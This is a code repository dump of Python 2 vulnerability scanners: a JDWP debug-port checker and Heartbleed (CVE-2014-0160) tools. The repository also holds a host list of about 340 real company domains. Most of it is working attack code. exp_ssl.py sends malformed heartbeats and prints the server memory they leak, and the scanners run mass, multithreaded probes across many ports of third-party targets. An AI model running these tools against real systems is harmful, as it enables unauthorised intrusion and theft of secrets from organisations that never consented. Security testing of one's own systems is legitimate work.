├── jdwp ├── __init__.py ├── jdwp.txt ├── __init__.pyc ├── jdwpshellifier.pyc ├── jdwpscanner.py ├── host.txt └── jdwpshellifier.py ├── sslchecker ├── __init__.py ├── hb.txt ├── __init__.pyc ├── heartbleed_scanner.pyc ├── heartbleed_scanner.py ├── exp_ssl.py └── host.txt └── README.md /jdwp/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /jdwp/jdwp.txt: -------------------------------------------------------------------------------- 1 | [JDWP Scan]Scan 749 hosts, Find 0 jdwp vul 2 | 3 | -------------------------------------------------------------------------------- /sslchecker/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | -------------------------------------------------------------------------------- /sslchecker/hb.txt: -------------------------------------------------------------------------------- 1 | [HeartBleed Scan]Scan 749 hosts, Find 0 heartbleed vul 2 | 3 | -------------------------------------------------------------------------------- /jdwp/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LeoHuang2015/ops_scanner/HEAD/jdwp/__init__.pyc -------------------------------------------------------------------------------- /jdwp/jdwpshellifier.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LeoHuang2015/ops_scanner/HEAD/jdwp/jdwpshellifier.pyc -------------------------------------------------------------------------------- /sslchecker/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LeoHuang2015/ops_scanner/HEAD/sslchecker/__init__.pyc -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ops_scanner 2 | 搜集和定制化一些运维安全漏洞扫描脚本 3 | 4 | ####sslcheck 5 | heartbleed扫描 6 | ####jdwp 7 | jdwp安全扫描 8 | -------------------------------------------------------------------------------- /sslchecker/heartbleed_scanner.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LeoHuang2015/ops_scanner/HEAD/sslchecker/heartbleed_scanner.pyc -------------------------------------------------------------------------------- /jdwp/jdwpscanner.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | """A quick scanner for JDWP(java debugger) vulnerability """ 4 | 5 | import socket 6 | import time 7 | import struct 8 | import urllib 9 | import argparse 10 | import select 11 | import signal 12 | import threading 13 | from multiprocessing.dummy import Pool 14 | from jdwpshellifier import JDWPClient 15 | 16 | lock = threading.Lock() 17 | threadpool = Pool(processes=50) 18 | socket.setdefaulttimeout(5) 19 | scan_results = [] 20 | 21 | def signal_handler(signal, frame): 22 | print "Ctrl+C pressed.. aborting..." 23 | threadpool.terminate() 24 | threadpool.done = True 25 | 26 | def handle_result(host, port, result): 27 | tm = time.time() 28 | with lock: 29 | scan_results.append([host, port, result]) 30 | 31 | 32 | 33 | def jdwp_connect_check(*kw): 34 | 35 | result = False 36 | retcode = 0 37 | 38 | port = 8000 39 | #print len(kw), len(*kw), kw 40 | if len(*kw) == 1: 41 | host = kw[0][0] 42 | elif len(*kw) == 2: 43 | host, port = kw[0][0], int(kw[0][1]) 44 | else: 45 | print "get para error" 46 | 47 | try: 48 | cli = JDWPClient(host, port) 49 | cli.start() 50 | print "connect target:", host, port 51 | result = True 52 | raise KeyboardInterrupt 53 | 54 | except KeyboardInterrupt: 55 | pass 56 | 57 | except socket.timeout, e: 58 | print "[-] Timeout: %s" %(e) 59 | 60 | except Exception, e: 61 | print ("[-] Exception: %s" % e) 62 | 63 | finally: 64 | try: 65 | cli.leave() 66 | except: 67 | pass 68 | 69 | handle_result(host, port, result) 70 | return result 71 | 72 | 73 | def jdwp_file_check(check_file, result_file = None): 74 | port = 8000 75 | 76 | scan_list = [] 77 | 78 | with open(check_file) as f: 79 | for line in f: 80 | line = line.strip() 81 | if not line: 82 | continue 83 | if ":" in line: 84 | host, port = line.split(":") 85 | elif "\t" in line: 86 | host, port = line.split("\t") 87 | elif " " in line: 88 | host, port = line.split(" ") 89 | else: 90 | host = line 91 | 92 | scan_list.append([host, port]) 93 | 94 | task = threadpool.map(jdwp_connect_check, scan_list) 95 | 96 | threadpool.close() 97 | threadpool.join() 98 | 99 | vul_results = [] 100 | for x in scan_results: 101 | print x 102 | if x[2]: 103 | vul_results.append(x) 104 | 105 | if result_file: 106 | with open(result_file, 'w') as f: 107 | f.write("[JDWP Scan]Scan %d hosts, Find %d jdwp vul\n\n" % (len(scan_results), len(vul_results))) 108 | for x in vul_results: 109 | h, p, r = x 110 | f.write("%s %s\n" %(h, p)) 111 | 112 | if __name__ == '__main__': 113 | 114 | 115 | #target, port = "10.240.137.145", 443 116 | #jdwp_connect_check([target, port]) 117 | 118 | input_file = "host.txt" 119 | output_file = "jdwp.txt" 120 | 121 | jdwp_file_check(input_file, output_file) -------------------------------------------------------------------------------- /sslchecker/heartbleed_scanner.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | """A quick scanner for SSL heartbleed vulnerability (CVE-2014-0160)""" 4 | 5 | import os 6 | import struct 7 | import socket 8 | import time 9 | import select 10 | import signal 11 | import threading 12 | from multiprocessing.dummy import Pool 13 | 14 | lock = threading.Lock() 15 | scan_results = [] 16 | threadpool = Pool(processes=50) 17 | 18 | 19 | def signal_handler(signal, frame): 20 | print "Ctrl+C pressed.. aborting..." 21 | threadpool.terminate() 22 | threadpool.done = True 23 | 24 | 25 | def h2bin(x): 26 | ''' 27 | "16 03 03 00 dc 01 00 00 d8 03 03 53" --> '\x16\x03\x03\x00\xdc\x01\x00\x00\xd8\x03\x03S' 28 | ''' 29 | return x.replace(' ', '').replace('\n', '').decode('hex') 30 | 31 | #tls clienthello package 32 | hello = h2bin(''' 33 | 16 03 03 00 dc 01 00 00 d8 03 03 53 34 | 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf 35 | bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 36 | 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 37 | 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c 38 | c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 39 | c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 40 | c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c 41 | c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 42 | 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 43 | 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 44 | 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 45 | 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 46 | 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 47 | 00 0f 00 01 01 48 | ''') 49 | 50 | def recvall(s, length, timeout=5): 51 | endtime = time.time() + timeout 52 | rdata = '' 53 | remain = length 54 | while remain > 0: 55 | rtime = endtime - time.time() 56 | if rtime < 0: 57 | return None 58 | r, w, e = select.select([s], [], [], 5) 59 | if s in r: 60 | try: 61 | data = s.recv(remain) 62 | except Exception, e: 63 | return None 64 | # EOF? 65 | if not data: 66 | return None 67 | rdata += data 68 | remain -= len(data) 69 | return rdata 70 | 71 | 72 | def recvmsg(s): 73 | hdr = recvall(s, 5) 74 | 75 | # confirm Server Hello 76 | if hdr is None: 77 | return None, None, None 78 | 79 | # C ---- [big-edition] + [unsigned char] + [unsigned short] + [unsigned short] 80 | # Python ---- [big-edition] + integer + integer + integer 81 | # [Content Type] + [Version] + [Length] 82 | typ, ver, ln = struct.unpack('>BHH', hdr) 83 | 84 | pay = recvall(s, ln, 10) 85 | if pay is None: 86 | return None, None, None 87 | return typ, ver, pay 88 | 89 | def hit_hb(s): 90 | while True: 91 | 92 | # TLSv1.1 Record Layer: Encrypted Heartbeat 93 | # Content Type: Heartbeat (24) 94 | # Version: TLS 1.1 (0x0302) 95 | # Length: 19 96 | # Encrypted Heartbeat Message 97 | typ, ver, pay = recvmsg(s) 98 | if typ is None: 99 | return False 100 | 101 | if typ == 24: 102 | return True 103 | 104 | if typ == 21: 105 | return False 106 | 107 | def hexdump(s): 108 | for b in xrange(0, len(s), 16): 109 | lin = [c for c in s[b : b + 16]] 110 | hxdat = ' '.join('%02X' % ord(c) for c in lin) 111 | pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin) 112 | print ' %04x: %-48s %s' % (b, hxdat, pdat) 113 | print 114 | 115 | 116 | def unpack_handshake(pay): 117 | """ 118 | Unpack the SSL handshake in Multiple Handshake Message 119 | """ 120 | paylen = len(pay) 121 | offset = 0 122 | payarr = [] 123 | 124 | while offset < paylen: 125 | h = pay[offset:offset + 4] 126 | t, l24 = struct.unpack('>B3s', h) 127 | l = struct.unpack('>I', '\x00' + l24)[0] 128 | payarr.append(( 129 | t, 130 | l, 131 | pay[offset+4:offset+4+l] 132 | )) 133 | offset = offset+l+4 134 | return payarr 135 | 136 | def is_vulnerable(host, timeout, port=443): 137 | """ Check if remote host is vulnerable to heartbleed 138 | 139 | Returns: 140 | None -- If remote host has no ssl 141 | False -- Remote host has ssl but likely not vulnerable 142 | True -- Remote host might be vulnerable 143 | """ 144 | 145 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 146 | s.settimeout(int(timeout)) 147 | 148 | #print "[x]host, port", host, port, "---------" 149 | try: 150 | s.connect((host, int(port))) 151 | except Exception, e: 152 | return None 153 | 154 | # 发送 clienthello 155 | s.send(hello) 156 | 157 | # 等待返回 158 | while True: 159 | typ, ver, pay = recvmsg(s) 160 | if typ is None: 161 | return None 162 | 163 | if typ == 22: 164 | payarr = unpack_handshake(pay) 165 | # Look for server hello done message. 166 | finddone = [t for t, l, p in payarr if t == 14] 167 | if len(finddone) > 0: 168 | break 169 | 170 | 171 | # OpenSSL responds with records of length 0x4000. It starts with 3 bytes 172 | # (length, response type) and ends with a 16 byte padding. If the payload is 173 | # too small, OpenSSL buffers it and this will cause issues with repeated 174 | # heartbeat requests. Therefore request a payload that fits exactly in four 175 | # records (0x4000 * 4 - 3 - 16 = 0xffed). 176 | #''' 177 | ver_chr = chr(ver&0xff) 178 | #hb = h2bin("18 03") + ver_chr + h2bin("40 00 01 3f fd") + "\x01"*16381 179 | #hb += h2bin("18 03") + ver_chr + h2bin("00 03 01 00 00") 180 | hb = h2bin("18 03") + ver_chr + h2bin("00 03 01 40 00") 181 | #''' 182 | 183 | """ 184 | hb = h2bin(''' 185 | 18 03 03 00 03 186 | 01 40 00 187 | ''') 188 | #""" 189 | 190 | 191 | s.send(hb) 192 | 193 | return hit_hb(s) 194 | 195 | 196 | def scan_host(kw): 197 | """ Scans a single host, logs into 198 | 199 | Returns: 200 | list(timestamp, ipaddress, vulnerabilitystatus) 201 | """ 202 | port = 443 203 | timeout = 5 204 | if len(kw) == 1: 205 | host = kw[0] 206 | print "xxxxxxxxxx", host, port 207 | elif len(kw) == 2: 208 | host, port = kw[0], int(kw[1]) 209 | elif len(kw) == 3: 210 | host, port, timeout = kw[0], int(kw[1]), kw[2] 211 | else: 212 | print "get para error" 213 | 214 | #print host, port, timeout 215 | 216 | result = is_vulnerable(host, timeout, port) 217 | 218 | handle_result(host, port, result) 219 | 220 | return result 221 | 222 | def handle_result(host, port, result): 223 | tm = time.time() 224 | with lock: 225 | scan_results.append([host, port, result]) 226 | 227 | 228 | def hb_file_check(check_file, result_file = None): 229 | scan_list = [] 230 | with open(check_file) as f: 231 | for line in f: 232 | port = 443 233 | line = line.strip() 234 | if not line: 235 | continue 236 | 237 | if ":" in line: 238 | host, port = line.split(":") 239 | elif "\t" in line: 240 | host, port = line.split("\t") 241 | elif " " in line: 242 | host, port = line.split(" ") 243 | else: 244 | host = line 245 | 246 | scan_list.append([host, port]) 247 | 248 | task = threadpool.map(scan_host, scan_list) 249 | 250 | threadpool.close() 251 | threadpool.join() 252 | 253 | vul_results = [] 254 | for x in scan_results: 255 | #print x 256 | if x[2]: 257 | vul_results.append(x) 258 | 259 | if result_file: 260 | with open(result_file, 'w') as f: 261 | f.write("[HeartBleed Scan]Scan %d hosts, Find %d heartbleed vul\n\n" % (len(scan_results), len(vul_results))) 262 | for x in vul_results: 263 | h, p, r = x 264 | f.write("%s %s\n" %(h, p)) 265 | 266 | def hb_blind_check(check_file, result_file = None): 267 | '''scan default port''' 268 | port_list = [25, 269 | 465, 270 | 110, 271 | 995, 272 | 143, 273 | 993, 994, 274 | 80, 8080, 275 | 443, 8443, 276 | 1194, 277 | 5988, 278 | 5989, 279 | 5990, 280 | 6443, 281 | 6771, 282 | 6789, 283 | 5443] 284 | 285 | scan_list = [] 286 | 287 | with open(check_file) as f: 288 | for line in f: 289 | host = line.strip() 290 | if not host: 291 | continue 292 | for port in port_list: 293 | scan_list.append([host, port]) 294 | 295 | 296 | task = threadpool.map(scan_host, scan_list) 297 | 298 | threadpool.close() 299 | threadpool.join() 300 | 301 | vul_results = [] 302 | for x in scan_results: 303 | #print x 304 | if x[2]: 305 | vul_results.append(x) 306 | 307 | if result_file: 308 | with open(result_file, 'w') as f: 309 | f.write("[HeartBleed Scan]Scan %d hosts, Find %d heartbleed vul\n\n" % (len(scan_results), len(vul_results))) 310 | for x in vul_results: 311 | h, p, r = x 312 | f.write("%s %s\n" %(h, p)) 313 | 314 | 315 | if __name__ == '__main__': 316 | 317 | signal.signal(signal.SIGINT, signal_handler) 318 | 319 | 320 | input_file = "host.txt" 321 | result_file = "hb.txt" 322 | hb_file_check(input_file, result_file) 323 | 324 | input_file = "../test/only_host.txt" 325 | #hb_blind_check(input_file, result_file) 326 | -------------------------------------------------------------------------------- /sslchecker/exp_ssl.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | """A quick scanner for SSL heartbleed vulnerability (CVE-2014-0160)""" 4 | import sys 5 | import os 6 | import struct 7 | import socket 8 | import time 9 | import select 10 | import signal 11 | import threading 12 | from multiprocessing.dummy import Pool 13 | 14 | lock = threading.Lock() 15 | scan_results = [] 16 | threadpool = Pool(processes=50) 17 | 18 | 19 | def signal_handler(signal, frame): 20 | print "Ctrl+C pressed.. aborting..." 21 | threadpool.terminate() 22 | threadpool.done = True 23 | 24 | 25 | def h2bin(x): 26 | ''' 27 | "16 03 03 00 dc 01 00 00 d8 03 03 53" --> '\x16\x03\x03\x00\xdc\x01\x00\x00\xd8\x03\x03S' 28 | ''' 29 | return x.replace(' ', '').replace('\n', '').decode('hex') 30 | 31 | #tls clienthello package 32 | hello = h2bin(''' 33 | 16 03 03 00 dc 01 00 00 d8 03 03 53 34 | 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf 35 | bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 36 | 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 37 | 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c 38 | c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 39 | c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 40 | c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c 41 | c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 42 | 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 43 | 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 44 | 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 45 | 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 46 | 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 47 | 00 0f 00 01 01 48 | ''') 49 | 50 | def recvall(s, length, timeout=5): 51 | endtime = time.time() + timeout 52 | rdata = '' 53 | remain = length 54 | while remain > 0: 55 | rtime = endtime - time.time() 56 | if rtime < 0: 57 | return None 58 | r, w, e = select.select([s], [], [], 5) 59 | if s in r: 60 | try: 61 | data = s.recv(remain) 62 | except Exception, e: 63 | return None 64 | # EOF? 65 | if not data: 66 | return None 67 | rdata += data 68 | remain -= len(data) 69 | return rdata 70 | 71 | 72 | def recvmsg(s): 73 | hdr = recvall(s, 5) 74 | 75 | # confirm Server Hello 76 | if hdr is None: 77 | return None, None, None 78 | 79 | # C ---- [big-edition] + [unsigned char] + [unsigned short] + [unsigned short] 80 | # Python ---- [big-edition] + integer + integer + integer 81 | # [Content Type] + [Version] + [Length] 82 | typ, ver, ln = struct.unpack('>BHH', hdr) 83 | 84 | pay = recvall(s, ln, 10) 85 | if pay is None: 86 | return None, None, None 87 | return typ, ver, pay 88 | 89 | def hit_hb(s): 90 | while True: 91 | 92 | # TLSv1.1 Record Layer: Encrypted Heartbeat 93 | # Content Type: Heartbeat (24) 94 | # Version: TLS 1.1 (0x0302) 95 | # Length: 19 96 | # Encrypted Heartbeat Message 97 | typ, ver, pay = recvmsg(s) 98 | if typ is None: 99 | return False 100 | 101 | if typ == 24: 102 | print 'Received heartbeat response:' 103 | hexdump(pay) 104 | if len(pay) > 3: 105 | print 'WARNING: server returned more data than it should - server is vulnerable!' 106 | #if opts.out is not None: 107 | # with open(opts.out, "a") as out: 108 | # out.write(pay) 109 | else: 110 | print 'Server processed malformed heartbeat, but did not return any extra data.' 111 | return True 112 | 113 | if typ == 21: 114 | return False 115 | 116 | def hexdump(s): 117 | pdat = '' 118 | for b in xrange(0, len(s), 64): 119 | lin = [c for c in s[b : b + 16]] 120 | pdat += ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin) 121 | 122 | print '%s' % (pdat.replace('......', ''),) 123 | print 124 | 125 | ''' 126 | def hexdump(s): 127 | for b in xrange(0, len(s), 16): 128 | lin = [c for c in s[b : b + 16]] 129 | hxdat = ' '.join('%02X' % ord(c) for c in lin) 130 | pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin) 131 | print ' %04x: %-48s %s' % (b, hxdat, pdat) 132 | print 133 | ''' 134 | 135 | def unpack_handshake(pay): 136 | """ 137 | Unpack the SSL handshake in Multiple Handshake Message 138 | """ 139 | paylen = len(pay) 140 | offset = 0 141 | payarr = [] 142 | 143 | while offset < paylen: 144 | h = pay[offset:offset + 4] 145 | t, l24 = struct.unpack('>B3s', h) 146 | l = struct.unpack('>I', '\x00' + l24)[0] 147 | payarr.append(( 148 | t, 149 | l, 150 | pay[offset+4:offset+4+l] 151 | )) 152 | offset = offset+l+4 153 | return payarr 154 | 155 | def is_vulnerable(host, timeout, port=443): 156 | """ Check if remote host is vulnerable to heartbleed 157 | 158 | Returns: 159 | None -- If remote host has no ssl 160 | False -- Remote host has ssl but likely not vulnerable 161 | True -- Remote host might be vulnerable 162 | """ 163 | 164 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 165 | s.settimeout(int(timeout)) 166 | 167 | #print "[x]host, port", host, port, "---------" 168 | try: 169 | s.connect((host, int(port))) 170 | except Exception, e: 171 | return None 172 | 173 | # 发送 clienthello 174 | s.send(hello) 175 | 176 | # 等待返回 177 | while True: 178 | typ, ver, pay = recvmsg(s) 179 | if typ is None: 180 | return None 181 | 182 | if typ == 22: 183 | payarr = unpack_handshake(pay) 184 | # Look for server hello done message. 185 | finddone = [t for t, l, p in payarr if t == 14] 186 | if len(finddone) > 0: 187 | break 188 | 189 | 190 | # OpenSSL responds with records of length 0x4000. It starts with 3 bytes 191 | # (length, response type) and ends with a 16 byte padding. If the payload is 192 | # too small, OpenSSL buffers it and this will cause issues with repeated 193 | # heartbeat requests. Therefore request a payload that fits exactly in four 194 | # records (0x4000 * 4 - 3 - 16 = 0xffed). 195 | #''' 196 | ver_chr = chr(ver&0xff) 197 | #hb = h2bin("18 03") + ver_chr + h2bin("40 00 01 3f fd") + "\x01"*16381 198 | #hb += h2bin("18 03") + ver_chr + h2bin("00 03 01 00 00") 199 | hb = h2bin("18 03") + ver_chr + h2bin("00 03 01 40 00") 200 | #''' 201 | 202 | """ 203 | hb = h2bin(''' 204 | 18 03 03 00 03 205 | 01 40 00 206 | ''') 207 | #""" 208 | 209 | 210 | s.send(hb) 211 | 212 | return hit_hb(s) 213 | 214 | 215 | def scan_host(*kw): 216 | """ Scans a single host, logs into 217 | 218 | Returns: 219 | list(timestamp, ipaddress, vulnerabilitystatus) 220 | """ 221 | port = 443 222 | timeout = 5 223 | if len(*kw) == 1: 224 | host = kw[0][0] 225 | elif len(*kw) == 2: 226 | host, port = kw[0][0], int(kw[0][1]) 227 | elif len(*kw) == 3: 228 | host, port, timeout = kw[0][0], int(kw[0][1]), kw[0][1] 229 | else: 230 | print "get para error" 231 | 232 | #print host, port, timeout 233 | 234 | result = is_vulnerable(host, timeout, port) 235 | 236 | handle_result(host, port, result) 237 | 238 | return result 239 | 240 | def handle_result(host, port, result): 241 | tm = time.time() 242 | with lock: 243 | scan_results.append([host, port, result]) 244 | 245 | 246 | def hb_file_check(check_file, result_file = None): 247 | port = 443 248 | 249 | scan_list = [] 250 | 251 | with open(check_file) as f: 252 | for line in f: 253 | line = line.strip() 254 | if not line: 255 | continue 256 | if ":" in line: 257 | host, port = line.split(":") 258 | elif "\t" in line: 259 | host, port = line.split("\t") 260 | elif " " in line: 261 | host, port = line.split(" ") 262 | else: 263 | host = line 264 | 265 | scan_list.append([host, port]) 266 | 267 | task = threadpool.map(scan_host, scan_list) 268 | 269 | threadpool.close() 270 | threadpool.join() 271 | 272 | vul_results = [] 273 | for x in scan_results: 274 | #print x 275 | if x[2]: 276 | vul_results.append(x) 277 | 278 | if result_file: 279 | with open(result_file, 'w') as f: 280 | f.write("[HeartBleed Scan]Scan %d hosts, Find %d heartbleed vul\n\n" % (len(scan_results), len(vul_results))) 281 | for x in vul_results: 282 | h, p, r = x 283 | f.write("%s %s\n" %(h, p)) 284 | 285 | def hb_blind_check(check_file, result_file = None): 286 | '''scan default port''' 287 | port_list = [25, 288 | 465, 289 | 110, 290 | 995, 291 | 143, 292 | 993, 994, 293 | 80, 8080, 294 | 443, 8443, 295 | 1194, 296 | 5988, 297 | 5989, 298 | 5990, 299 | 6443, 300 | 6771, 301 | 6789, 302 | 5443] 303 | 304 | scan_list = [] 305 | 306 | with open(check_file) as f: 307 | for line in f: 308 | host = line.strip() 309 | if not host: 310 | continue 311 | for port in port_list: 312 | scan_list.append([host, port]) 313 | 314 | 315 | task = threadpool.map(scan_host, scan_list) 316 | 317 | threadpool.close() 318 | threadpool.join() 319 | 320 | vul_results = [] 321 | for x in scan_results: 322 | #print x 323 | if x[2]: 324 | vul_results.append(x) 325 | 326 | if result_file: 327 | with open(result_file, 'w') as f: 328 | f.write("[HeartBleed Scan]Scan %d hosts, Find %d heartbleed vul\n\n" % (len(scan_results), len(vul_results))) 329 | for x in vul_results: 330 | h, p, r = x 331 | f.write("%s %s\n" %(h, p)) 332 | 333 | 334 | if __name__ == '__main__': 335 | 336 | signal.signal(signal.SIGINT, signal_handler) 337 | 338 | host = [sys.argv[1], sys.argv[2]] 339 | print host 340 | scan_host(host) 341 | -------------------------------------------------------------------------------- /jdwp/host.txt: -------------------------------------------------------------------------------- 1 | tencent.com 2 | baidu.com 3 | sina.com.cn 4 | sohu.com 5 | discuz.net 6 | rising.com.cn 7 | alibaba.com 8 | 360.cn 9 | maxthon.cn 10 | renren.com 11 | ifeng.com 12 | snda.com 13 | sdo.com 14 | sogou.com 15 | 163.com 16 | 9you.com 17 | duba.net 18 | xunlei.com 19 | ctrip.com 20 | 19lou.com 21 | shooter.cn 22 | verycd.com 23 | mop.com 24 | ourgame.com 25 | douban.com 26 | youku.com 27 | wanmei.com 28 | 39.net 29 | uc.cn 30 | pps.tv 31 | taobao.com 32 | blogbus.com 33 | shopex.cn 34 | gtja.com 35 | alipay.com 36 | phpwind.net 37 | ftchinese.com 38 | lenovo.com 39 | www.net.cn 40 | 17173.com 41 | qiyi.com 42 | focus.cn 43 | chinaren.com 44 | tudou.com 45 | ztgame.com 46 | mtime.com 47 | tompda.com 48 | 51.com 49 | shandagames.com 50 | 4399.com 51 | jiepang.com 52 | it168.com 53 | huawei.com 54 | ku6.com 55 | dxy.cn 56 | xiami.com 57 | xywy.com 58 | qunar.com 59 | 7daysinn.cn 60 | phpcms.cn 61 | pipi.cn 62 | 58.com 63 | ganji.com 64 | chinaunix.net 65 | songtaste.com 66 | gaopeng.com 67 | duowan.com 68 | dnspod.cn 69 | tuchong.com 70 | yeepay.com 71 | the9.com 72 | ylmf.com 73 | cnzz.com 74 | lianzhong.com 75 | pindao.com 76 | jd.com 77 | dzwww.com 78 | 91wan.com 79 | guokr.com 80 | newegg.com.cn 81 | lashou.com 82 | 55tuan.com 83 | zhihu.com 84 | cnbeta.com 85 | pptv.com 86 | 9158.com 87 | ubox.cn 88 | hudong.com 89 | sangfor.com.cn 90 | vancl.com 91 | unnoo.com 92 | sucop.com 93 | bianfeng.com 94 | 6.cn 95 | elong.com 96 | 10jqka.com.cn 97 | anquanbao.com 98 | taomee.com 99 | yxlink.com 100 | php.net 101 | coremail.cn 102 | crucco.com 103 | zhenai.com 104 | dangdang.com 105 | aipai.com 106 | xiaomi.com 107 | joy.cn 108 | letao.com 109 | jingwei.com 110 | 51job.com 111 | changyou.com 112 | hada.me 113 | sf-express.com 114 | kingsoft.com 115 | leyou.com 116 | jiayuan.com 117 | soufun.com 118 | youtx.com 119 | lefeng.com 120 | yoybuy.com 121 | eset.com.cn 122 | 7k7k.com 123 | aqgj.cn 124 | guosen.com.cn 125 | ly.com 126 | tom.com 127 | cntv.cn 128 | veryeast.cn 129 | 12306.cn 130 | goodbaby.com 131 | cenwor.com 132 | tttuangou.net 133 | jiangmin.com 134 | yonyou.com 135 | ccw.com.cn 136 | vip.com 137 | ftsafe.com.cn 138 | csdn.net 139 | topsec.com.cn 140 | west263.com 141 | wanda.cn 142 | letv.com 143 | dns.com.cn 144 | diandian.com 145 | kugou.com 146 | syyx.com 147 | xiu.com 148 | baihe.com 149 | kingdee.com 150 | iboxpay.com 151 | 21cn.com 152 | nokia.com 153 | playcool.com 154 | duote.com 155 | wdlinux.cn 156 | yupoo.com 157 | 263.net 158 | coo8.com 159 | 36kr.com 160 | dahe.cn 161 | yahoo.com 162 | cmseasy.cn 163 | tianya.cn 164 | suning.com 165 | zol.com.cn 166 | easybuy.com.cn 167 | gome.com.cn 168 | jiajia.me 169 | 5173.com 170 | baobeihuijia.com 171 | thinksky.hk 172 | neusoft.com 173 | gamemayi.com 174 | 51web.com 175 | dajie.com 176 | qianpin.com 177 | 2345.com 178 | 51cto.com 179 | guang.com 180 | lvmama.com 181 | happigo.com 182 | m18.com 183 | gooann.com 184 | lakala.com 185 | knownsec.com 186 | 99.com 187 | xd.com 188 | jiapin.com 189 | docin.com 190 | ip66.com 191 | tnyoo.com 192 | cwan.com 193 | dianping.com 194 | sclub.com.tw 195 | iciba.com 196 | xoyo.com 197 | ijinshan.com 198 | xueqiu.com 199 | chinacache.com 200 | hx168.com.cn 201 | 17sup.com 202 | mangocity.com 203 | shop.edu.cn 204 | tiexue.net 205 | cpic.com.cn 206 | venustech.com.cn 207 | huatu.com 208 | 178.com 209 | yihaodian.com 210 | house365.com 211 | 51greenorange.com 212 | 360shop.com.cn 213 | weibo.com 214 | touzhu.cn 215 | qiaogu.com 216 | zblogcn.com 217 | firefox.com.cn 218 | xcar.com.cn 219 | goldmail.cn 220 | trip8080.com 221 | baijob.com 222 | zhubajie.com 223 | acfun.tv 224 | qfpay.com 225 | xianguo.com 226 | tp-link.com.cn 227 | zhenpin.com 228 | hiall.com.cn 229 | 800app.com 230 | yuantiku.com 231 | redbaby.com.cn 232 | baixing.com 233 | 2cto.com 234 | linktrust.com.cn 235 | womai.com 236 | tuciabbay.com 237 | 1ting.com 238 | akcms.com 239 | kingosoft.com 240 | meitu.com 241 | meizu.com 242 | taocms.org 243 | 53kf.com 244 | oschina.net 245 | thinksns.com 246 | hxage.com 247 | moliyo.com 248 | 3158.cn 249 | oppo.com 250 | tuniu.com 251 | 3158.com 252 | meituan.com 253 | eversec.com.cn 254 | kuaibo.com 255 | cins.cn 256 | papa.me 257 | 591wed.com 258 | cheshi.com 259 | shopxx.net 260 | shopxx.net 261 | m1905.com 262 | argos.cn 263 | tgbus.com 264 | mafengwo.cn 265 | cnblogs.com 266 | fun.tv 267 | hupu.com 268 | sudu.cn 269 | feng.com 270 | nandu.com 271 | changba.com 272 | jinwankansha.com 273 | 51bi.com 274 | chinaz.com 275 | umeng.com 276 | mogujie.com 277 | xinghua.org.cn 278 | coolping.com 279 | chinanetcenter.com 280 | iyiyun.com 281 | yunyun.com 282 | eguan.cn 283 | winenice.com 284 | opera.com 285 | zhimei.com 286 | tongbu.com 287 | haodf.com 288 | 3322.org 289 | dodonew.com 290 | lesuke.com 291 | iiyi.com 292 | sudytech.com 293 | 8684.cn 294 | bjsako.com 295 | newsmyshop.com 296 | tiancity.com 297 | looyu.com 298 | jollymm.com 299 | dopool.com 300 | fantong.com 301 | zhuna.cn 302 | secoo.com 303 | gamtee.com 304 | huanqiu.com 305 | kanglu.com 306 | wssys.net 307 | xinnet.com 308 | ebrun.com 309 | duoshuo.com 310 | bilibili.tv 311 | gfan.com 312 | pconline.com.cn 313 | 50cms.com 314 | trs.com.cn 315 | xdf.cn 316 | htinns.com 317 | wacai.com 318 | mplife.com 319 | donews.com 320 | qyer.com 321 | 9978.cn 322 | admin5.com 323 | etuan.com 324 | liepin.com 325 | 998.com 326 | eastmoney.com 327 | hc360.com 328 | welove520.com 329 | autonavi.com 330 | lusen.com 331 | ecisp.cn 332 | lightinthebox.com 333 | desdev.cn 334 | sgcc.com.cn 335 | mydrivers.com 336 | zte.com.cn 337 | 56.com 338 | mbaobao.com 339 | airchina.com.cn 340 | spacebuilder.cn 341 | 